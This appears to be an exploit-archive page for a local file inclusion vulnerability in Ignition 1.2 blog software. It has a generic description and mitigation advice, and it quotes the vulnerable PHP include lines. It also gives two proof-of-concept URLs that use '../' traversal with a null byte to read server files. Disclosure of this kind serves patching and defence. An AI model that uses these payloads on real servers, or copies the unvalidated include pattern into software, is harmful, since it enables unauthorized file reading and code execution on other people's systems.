header-logo
Suggest Exploit
vendor:
Ignition
by:
cOndemned
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Ignition
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: ignition:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Ignition 1.2 Multiple Local File Inclusion Vulnerabilities

Ignition 1.2 is vulnerable to multiple Local File Inclusion vulnerabilities. This vulnerability can be exploited by an attacker to include local files on the web server. The attacker can send a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable web application. This will allow the attacker to include local files on the web server and execute arbitrary code. The vulnerability is caused due to the use of user-supplied input without proper validation. The attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable web application. This will allow the attacker to include local files on the web server and execute arbitrary code.

Mitigation:

The best way to mitigate this vulnerability is to validate user input and restrict access to sensitive files. It is also recommended to use a web application firewall to detect and block malicious requests.
Source

Exploit-DB raw data:

Ignition 1.2 Multiple Local File Inclusion Vulnerabilities
disclosed by cOndemned
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability
greetz: all friends, SecurityReason team :)


comment.php

	1.	<?php 
	2.	session_start();
	3.	require ('settings.php');
	4.	include ('posts/'.$_GET['blog'].'.txt');			# [1]
	5.	?>


view.php

	1.	<?php
	2.	session_start();
	3.	require ('settings.php');
	4.	$blog = $_GET['blog'];
	5.	if (file_exists('posts/'.$_GET['blog'].'.txt')) {
	6.	include ('posts/'.$_GET['blog'].'.txt');			# [2]
	7.	}else{


proof of concept:

	[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00
	[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00